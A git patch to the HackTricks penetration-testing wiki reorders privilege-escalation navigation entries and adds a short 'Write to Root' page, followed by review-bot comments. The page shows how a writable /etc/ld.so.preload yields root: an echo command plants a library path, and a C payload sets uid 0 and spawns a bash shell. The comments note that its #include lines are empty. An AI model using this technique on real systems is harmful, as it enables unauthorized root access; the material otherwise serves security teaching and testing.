From c6405d9dccff1e763e148cf5a1d40aff155e697b Mon Sep 17 00:00:00 2001 From: CPol Date: Thu, 22 Sep 2022 23:27:50 +0000 Subject: [PATCH] GitBook: [#3500] No subject --- SUMMARY.md | 15 +++--- .../privilege-escalation/write-to-root.md | 47 +++++++++++++++++++ 2 files changed, 55 insertions(+), 7 deletions(-) create mode 100644 linux-hardening/privilege-escalation/write-to-root.md diff --git a/SUMMARY.md b/SUMMARY.md index 1bf9c9faa..875c43230 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -79,8 +79,7 @@ * [Checklist - Linux Privilege Escalation](linux-hardening/linux-privilege-escalation-checklist.md) * [Linux Privilege Escalation](linux-hardening/privilege-escalation/README.md) - * [SELinux](linux-hardening/privilege-escalation/selinux.md) - * [Logstash](linux-hardening/privilege-escalation/logstash.md) + * [Cisco - vmanage](linux-hardening/privilege-escalation/cisco-vmanage.md) * [Containerd (ctr) Privilege Escalation](linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.md) * [Docker Basics & Breakout](linux-hardening/privilege-escalation/docker-breakout/README.md) * [AuthZ& AuthN - Docker Access Authorization Plugin](linux-hardening/privilege-escalation/docker-breakout/authz-and-authn-docker-access-authorization-plugin.md) 
@@ -93,23 +92,25 @@ * [Namespaces](linux-hardening/privilege-escalation/docker-breakout/namespaces.md) * [Docker --privileged](linux-hardening/privilege-escalation/docker-breakout/docker-privileged.md) * [Abusing Docker Socket for Privilege Escalation](linux-hardening/privilege-escalation/docker-breakout/abusing-docker-socket-for-privilege-escalation.md) - * [Node inspector/CEF debug abuse](linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md) - * [euid, ruid, suid](linux-hardening/privilege-escalation/euid-ruid-suid.md) * [Escaping from Jails](linux-hardening/privilege-escalation/escaping-from-limited-bash.md) - * [Cisco - vmanage](linux-hardening/privilege-escalation/cisco-vmanage.md) + * [euid, ruid, suid](linux-hardening/privilege-escalation/euid-ruid-suid.md) + * [Logstash](linux-hardening/privilege-escalation/logstash.md) + * [Node inspector/CEF debug abuse](linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md) * [D-Bus Enumeration & Command Injection Privilege Escalation](linux-hardening/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md) * [Interesting Groups - Linux PE](linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md) * [lxd/lxc Group - Privilege escalation](linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md) * [ld.so exploit example](linux-hardening/privilege-escalation/ld.so.conf-example.md) + * [Linux Active Directory](linux-hardening/privilege-escalation/linux-active-directory.md) * [Linux Capabilities](linux-hardening/privilege-escalation/linux-capabilities.md) * [NFS no\_root\_squash/no\_all\_squash misconfiguration PE](linux-hardening/privilege-escalation/nfs-no\_root\_squash-misconfiguration-pe.md) * [Payloads to execute](linux-hardening/privilege-escalation/payloads-to-execute.md) * [RunC Privilege Escalation](linux-hardening/privilege-escalation/runc-privilege-escalation.md) + * 
[SELinux](linux-hardening/privilege-escalation/selinux.md) + * [Socket Command Injection](linux-hardening/privilege-escalation/socket-command-injection.md) * [Splunk LPE and Persistence](linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md) * [SSH Forward Agent exploitation](linux-hardening/privilege-escalation/ssh-forward-agent-exploitation.md) - * [Socket Command Injection](linux-hardening/privilege-escalation/socket-command-injection.md) * [Wildcards Spare tricks](linux-hardening/privilege-escalation/wildcards-spare-tricks.md) - * [Linux Active Directory](linux-hardening/privilege-escalation/linux-active-directory.md) + * [Write to Root](linux-hardening/privilege-escalation/write-to-root.md) * [Useful Linux Commands](linux-hardening/useful-linux-commands/README.md) * [Bypass Linux Shell Restrictions](linux-hardening/useful-linux-commands/bypass-bash-restrictions.md) * [DDexec](linux-hardening/bypass-linux-shell-restrictions/ddexec.md) diff --git a/linux-hardening/privilege-escalation/write-to-root.md b/linux-hardening/privilege-escalation/write-to-root.md new file mode 100644 index 000000000..4f6bfbcd8 --- /dev/null +++ b/linux-hardening/privilege-escalation/write-to-root.md @@ -0,0 +1,47 @@ +# Write to Root + +
+ +Support HackTricks and get benefits! + +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** + +
+ +### /etc/ld.so.preload + +This file behaves like **`LD_PRELOAD`** env variable but it also works in **SUID binaries**.\ +If you can create it or modify it, you can just add a **path to a library that will be loaded** with each executed binary. + +For example: `echo "/tmp/pe.so" > /etc/ld.so.preload` + +```c +#include +#include +#include + +void _init() { + unlink("/etc/ld.so.preload"); + setgid(0); + setuid(0); + system("/bin/bash"); +} +//cd /tmp +//gcc -fPIC -shared -o pe.so pe.c -nostartfiles +``` + +
+ +Support HackTricks and get benefits! + +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** + +
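Review bot: In the first SUMMARY.md hunk (`@@ -79,8 +79,7`), the `SELinux` and `Logstash` entries are removed and `Cisco - vmanage` is inserted with nothing in the commit message to explain it, since the subject is "GitBook: [#3500] No subject". Read alone, the hunk looks like two pages being dropped from the navigation. Both entries reappear in the next hunk, so this is a move, and the subject should say so, for example that the privilege-escalation entries are being reordered and a Write to Root page is being added. Splitting the reorder and the new page into separate commits would also make the history easier to audit.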
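Review bot: In the second SUMMARY.md hunk (`@@ -93,23 +92,25`), the reorder looks alphabetical but is left unfinished: `Logstash` and `Node inspector/CEF debug abuse` are placed directly after `euid, ruid, suid`, ahead of the unchanged `D-Bus Enumeration & Command Injection Privilege Escalation`, `Interesting Groups - Linux PE` and `ld.so exploit example` lines. If alphabetical order is the intent, `D-Bus ...` belongs up with the `Cisco`, `Containerd` and `Docker` entries, `Logstash` after `Linux Capabilities`, and `Node inspector/CEF debug abuse` after the `NFS no_root_squash` entry. If some other grouping is intended, a short note in the commit message would keep the next editor from undoing it.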
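Review bot: In the new `write-to-root.md`, the three `#include` lines at the top of the C fence name no header, so the snippet does not compile as committed. The header names look like they were lost in the GitBook export and should be restored and checked in the rendered page. The `/etc/ld.so.preload` section also stops at the example. Because the page sits under `linux-hardening`, it should state the precondition in its own sentence (write access to `/etc/ld.so.preload` or to `/etc`) and give the reader a check: whether the file exists, who owns it, what mode it has, and whether writes to it are audited. Separately, the `echo "/tmp/pe.so" > /etc/ld.so.preload` line overwrites the file and `_init()` then calls `unlink("/etc/ld.so.preload")`, so anyone reproducing this on a lab host that already uses the file loses its original contents. The page should say so.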